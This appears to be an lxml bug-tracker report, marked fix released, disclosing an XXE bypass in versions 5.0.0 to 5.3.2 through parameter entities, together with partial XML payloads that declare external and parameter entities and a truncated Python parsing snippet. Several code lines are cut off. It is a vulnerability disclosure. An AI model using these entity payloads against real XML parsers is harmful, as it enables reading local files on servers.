XXE resolve_entities bypass using Parameter Entity
| Affects | Status | Importance | Assigned to | Milestone | |
|---|---|---|---|---|---|
| lxml |
Fix Released
|
High
|
scoder | ||
Bug Description
lxml lib from 5.0.0 restricts XXE parsing and requires resolve_entities to disable the restriction
Thus the xml below
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE msg [
<!ENTITY xxe SYSTEM 'file:/
]>
<msg>&xxe;</msg>
```
will not work without resolve_entities:
```
from lxml import etree
with open('test.xml', 'rb') as f:
xml_data = f.read()
parser = etree.XMLParser()
root = etree.fromstrin
print(etree.
```
but libxml doesn't restrict Parameter Entities, that leads to XXE
Thus the xml below
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE msg [
<!ENTITY % a '
'>
%a;
%b;
]>
<msg>&c;</msg>
```
works fine
I've tested on python:3.6-3.12, this works for 5.0.0 and till 5.3.2
| Changed in lxml: | |
| milestone: | 6.0 → 5.4.0 |

I'd also request a CVE for this bug, if you don't mind